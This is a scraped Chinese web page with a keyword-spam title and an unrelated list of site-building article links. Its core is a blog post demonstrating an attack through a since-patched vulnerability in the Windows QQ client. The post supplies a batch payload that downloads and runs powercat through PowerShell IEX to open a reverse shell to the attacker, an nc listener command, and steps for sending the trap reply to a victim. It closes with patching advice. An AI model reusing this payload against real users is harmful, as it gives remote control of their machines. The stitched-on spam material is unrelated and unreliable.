当前位置: 首页 > news >正文

月租网站空间网站规划文档

月租网站空间,网站规划文档,十大不收费看盘网站,客户网站制作管理系统简介 !! 内容仅供学习,请不要进行非法网络活动,网络不是法外之地!! 赛博昆仑是国内一家较为知名的网络安全公司,该公司今日报告称 Windows 版腾讯 QQ 桌面客户端出现高危安全漏洞,据称“黑客利用难度极低、危害较大”,腾讯刚刚已经紧急发布…

简介

!! 内容仅供学习,请不要进行非法网络活动,网络不是法外之地!!

赛博昆仑是国内一家较为知名的网络安全公司,该公司今日报告称 Windows 版腾讯 QQ 桌面客户端出现高危安全漏洞,据称“黑客利用难度极低、危害较大”,腾讯刚刚已经紧急发布了 9.7.15 版本 QQ,修复了该漏洞

攻击者视角

攻击者配置木马,这里使用powershell反弹会话模拟木马程序

@echo off powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ?.?.?.? -p ????? -e cmd pause

图片.png

本地发送一次

图片.png

选择回复

图片.png
最终Payload
图片.png

转发给受害者
————————

nc -lvvp 10031

图片.png

受害者点击回复内容后得到会话

图片.png

受害者视角

受害者点击回复内容,直接下载并自动打开木马文件

图片.png

图片.png

总结

近期,不要点击陌生人发送任何具有诱惑力的回复信息(可能会和其他rar或pdf等漏洞打组合拳利用),及时更新PC端QQ版本,此漏洞问题影响 Windows 版 QQ 9.7.13 及之前版本,QQ NT 版本不受该漏洞影响,安卓端用户不受影响

http://www.yayakq.cn/news/52947/

相关文章:

  • 做视频网站需要哪些技术wordpress添加模板文件
  • 精美的商城网站介绍个人网站被黑了
  • 如何做计算机网站平台网站
  • 网站后台图片传不上去怎么办是否网站备案
  • 网站的佣金怎么做会计分录响应式网站建设精英
  • 石家庄微网站临清网站推广
  • 网站后台更新栏目后 网站深圳网站建设创想营销
  • 网站建设首先要选择题中学生制作网站怎么做
  • 莆田有交做外贸网站的没宜昌建网站
  • 强的网站建设搜索引擎优化趋势
  • 免费个人网站搭建博物馆设计
  • 做网站开发的公司买域名的钱最后给了谁
  • 哈尔滨建设局网站网店装修的意义
  • 延吉网站建设网站网页制作企
  • 网站关键词标签广东企业移动网站建设哪家好
  • 东莞网推广网站建设自媒体运营
  • 网站网络推广方法wordpress登录页面模板
  • 上海市住房城乡建设部网站汕头市企业网站建设教程
  • 网站频繁改版高级ppt模板免费下载
  • 濮阳网站建设优化深圳网站制作的公司哪家好
  • 淄博周村网站建设公司seo搜索引擎优化关键词
  • 做什爱网站为什么要建设种苗供求网站
  • 爬虫做网站相关教程小米网络营销案例分析
  • 沧浪网站建设排名好的青岛网站建设
  • 网站盈利模式设计企业网站教程
  • 织梦手机网站教程做网站对象存储
  • 搞笑网站源代码北京装饰公司排行 2019
  • 网站备案需要ftp吗电子商务网络技术
  • 做网站需要服务器吗网站建设素材
  • 网站建设力度网站开发 招聘